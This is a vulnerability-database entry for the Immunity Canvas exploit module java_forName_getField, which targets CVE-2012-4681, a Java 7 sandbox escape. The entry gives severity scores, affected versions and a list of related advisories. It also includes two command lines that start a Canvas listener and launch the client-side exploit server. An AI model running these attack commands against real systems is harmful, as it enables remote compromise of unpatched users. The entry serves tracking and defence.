Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
canvasImmunity CanvasJAVA_FORNAME_GETFIELD
HistoryAug 28, 2012 - 12:55 a.m.

Immunity Canvas: JAVA_FORNAME_GETFIELD

2012-08-2800:55:00
Immunity Canvas
exploitlist.immunityinc.com
30

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%

JSON
Name java_forName_getField
CVE CVE-2012-4681 Exploit Pack
VENDOR: Sun
Notes:
There is a method invocation vulnerability using sun.awt.SunToolkit.getField()
This vulnerability can then be used together with some reflection tricks to disable the Java Security Manager to escape the sandbox.

Affected versions
JDK and JRE 7 Update 6 and earlier

Note: this does not work under JRE 6 due to the getField() function not working correctly.

Tested on:
- Windows 7 SP1 with JDK/JRE 7 and 7 update 6
- Windows XP SP3 with JDK/JRE 7 and 7 update 6

Needs more testing (likley to work on other targets)

To run from command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_forName_getField -O allowed_recon_modules:js_recon -O auto_detect_exploits:0

Repeatability: Infinite (client side - no crash)
References: http://pastie.org/4594319
Date public: 07/26/2012

Related

fedora 13
nessus 22
cisa 1
openvas 39
saint 4
threatpost 13
thn 4
metasploit 1
attackerkb 3
cisa_kev 1
securityvulns 2
cve 3
freebsd 1
checkpoint_advisories 2
ubuntucve 2
myhack58 1
prion 2
cert 1
zdi 1
seebug 1
redhat 3
oraclelinux 1
suse 3
centos 1
securelist 1
gentoo 1
fedora
fedora
[SECURITY] Fedora 17 Update: java-1.7.0-openjdk-1.7.0.25-2.3.10.3.fc17
2013-06-20 02:29:10
[SECURITY] Fedora 17 Update: java-1.7.0-openjdk-1.7.0.6-2.3.1.fc17.2
2012-09-03 22:53:20
[SECURITY] Fedora 18 Update: java-1.7.0-openjdk-1.7.0.6-2.3.1.fc18.2
2012-09-17 22:40:47
nessus
nessus
Fedora 16 : java-1.7.0-openjdk-1.7.0.6-2.3.1.fc16.2 (2012-13138)
2012-09-04 00:00:00
FreeBSD : Java 1.7 -- security manager bypass (16846d1e-f1de-11e1-8bd8-0022156e8794)
2012-08-31 00:00:00
Scientific Linux Security Update : java-1.6.0-sun on SL5.x i386/x86_64 (20120904)
2012-09-13 00:00:00
cisa
cisa
US-CERT Releases Oracle Java JRE 1.7 Security Advisory
2012-08-28 00:00:00
openvas
openvas
Fedora Update for java-1.7.0-openjdk FEDORA-2012-13131
2012-09-04 00:00:00
FreeBSD Ports: openjdk
2012-08-30 00:00:00
Fedora Update for java-1.7.0-openjdk FEDORA-2013-11281
2013-06-24 00:00:00
saint
saint
Oracle Java findMethod findClass Security Bypass
2012-08-30 00:00:00
Oracle Java findMethod findClass Security Bypass
2012-08-30 00:00:00
Oracle Java findMethod findClass Security Bypass
2012-08-30 00:00:00
threatpost
threatpost
Computer Virus Blacks Out Qatari Gas Producer
2012-08-30 16:48:35
Nasty New Java Zero Day Found; Exploit Kits Already Have It
2013-01-10 15:15:21
Oracle Releases Fix For Java CVE-2012-4681 Flaw
2012-08-30 18:12:34
thn
thn
Exploit Packs updated with New Java Zero-Day vulnerability
2013-01-10 18:09:00
Oracle releases patches for Java vulnerability CVE-2012-4681
2012-08-31 22:39:00
Exploit Packs updated with New Java Zero-Day vulnerability
2013-01-10 07:09:00
metasploit
metasploit
Java 7 Applet Remote Code Execution
2012-08-27 09:25:04
attackerkb
attackerkb
Java 7 Applet Remote Code Execution
2012-08-28 00:00:00
CVE-2012-4681
2012-08-28 00:00:00
CVE-2013-0422
2013-01-10 00:00:00
cisa_kev
cisa_kev
Oracle Java SE Runtime Environment (JRE) Arbitrary Code Execution Vulnerability
2022-03-03 00:00:00
securityvulns
securityvulns
Java environment limitations bypass
2012-09-02 00:00:00
[SE-2012-01] New security issue affecting Java SE 7 Update 7
2012-09-02 00:00:00
cve
cve
CVE-2012-4681
2012-08-28 00:55:00
CVE-2012-3539
2012-08-28 16:55:00
CVE-2013-0422
2013-01-10 21:55:00
freebsd
freebsd
Java 1.7 -- security manager bypass
2012-08-27 00:00:00
checkpoint_advisories
checkpoint_advisories
Java 7 Applet RCE Gondvv (CVE-2012-4681)
2012-08-28 00:00:00
Preemptive Protection against Oracle JRE Restrictions Bypass Remote Code Execution (CVE-2012-4681)
2012-10-01 00:00:00
ubuntucve
ubuntucve
CVE-2012-4681
2012-08-28 00:00:00
CVE-2013-0422
2013-01-10 00:00:00
myhack58
myhack58
The New Year initial, Java break first 0day-vulnerability warning-the black bar safety net
2013-01-11 00:00:00
prion
prion
Design/Logic Flaw
2012-08-28 00:55:00
Design/Logic Flaw
2013-01-10 21:55:00
cert
cert
Oracle Java JRE 1.7 Expression.execute() and SunToolkit.getField() fail to restrict access to privileged code
2012-08-27 00:00:00
zdi
zdi
Oracle Java java.beans.Statement Remote Code Execution Vulnerability
2012-12-21 00:00:00
seebug
seebug
Oracle Sun JRE 1.x θΏœη¨‹JRE漏洞
2012-09-04 00:00:00
redhat
redhat
(RHSA-2012:1225) Critical: java-1.7.0-oracle security update
2012-09-04 00:00:00
(RHSA-2012:1223) Important: java-1.7.0-openjdk security update
2012-09-03 00:00:00
(RHSA-2012:1289) Critical: java-1.7.0-ibm security update
2012-09-18 00:00:00
oraclelinux
oraclelinux
java-1.7.0-openjdk security update
2012-09-03 00:00:00
suse
suse
java-1_7_0-openjdk: security fix for remote exploit (critical)
2012-09-12 19:08:39
Security update for IBM Java (important)
2012-09-25 00:09:19
Security update for OpenJDK (important)
2012-10-24 22:08:57
centos
centos
java security update
2012-09-03 14:37:23
securelist
securelist
Investigation Report for the September 2014 Equation malware detection incident in the US
2017-11-16 10:00:34
gentoo
gentoo
Oracle JRE/JDK: Multiple vulnerabilities
2014-01-27 00:00:00

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%

JSON
Related for JAVA_FORNAME_GETFIELD
fedora13nessus22cisa1openvas39saint4threatpost13thn4metasploit1attackerkb3cisa_kev1securityvulns2cve3freebsd1checkpoint_advisories2ubuntucve2myhack581prion2cert1zdi1seebug1redhat3oraclelinux1suse3centos1securelist1gentoo1